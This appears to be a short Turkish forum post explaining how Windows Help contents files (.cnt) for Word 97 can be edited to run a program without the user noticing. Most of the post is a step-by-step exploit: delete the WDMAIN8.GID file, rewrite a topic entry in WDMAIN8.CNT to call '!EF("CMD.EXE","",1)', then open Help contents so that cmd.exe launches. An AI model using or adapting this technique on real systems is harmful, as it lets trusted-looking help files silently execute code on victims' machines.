Windowsun kullandığı Help dosya formatı (*.cnt , *.hlp) pek coğumuz icin zararsız dosya olarak bilinir. Ancak bulunan bir bug bunların başka amaclar icin kullanılabileceğinedikkat cekti. Bu dosyalar sayesinde hlp dosyasını calıştıran kişi farkına varmadan başka bir programı calıştırabilir.
*.cnt dosyalarında help dosyalarının Table Of Content leri yani başlık bilgileri yer alır. Zaten bir help dosyası calıştırınca otomatik olarak bu dosya oluşur. normalde bu windows tarafından oluışturulan ve zararsız bir dosyadır ancak normal kişilerin elinde tabiki. cnt dosyasının icinde hangi başlığın hangi help dosyasını cağırdığı kayıtlıdır. Bu kaydeı değiştirerek ibr programı calıştırabiliriz.

Exploiti:
- Once C:\Program Files\Microsoft Office\Office\WDMAIN8.GID dosyasını silin. (Gerekirse winhlp32.exe dosyasını kapatın.)

- C:\Program Files\Microsoft Office\Office\WDMAIN8.CNT dosyasını text dosyası gibi editleyerek şu satırları yazın.

Once şu satırı
3 Word 97 new [email protected] >REF

Şoyle değiştirin.

3 Word 97 new features=!EF("CMD.EXE","",1)

- Winword acıp Hlp Menusunu Oradan Content i secin.
- "Word 97 new features" başlığını bulup tıklayın.
- cmd.exe dosyasının calıştığını goreceksiniz....
__________________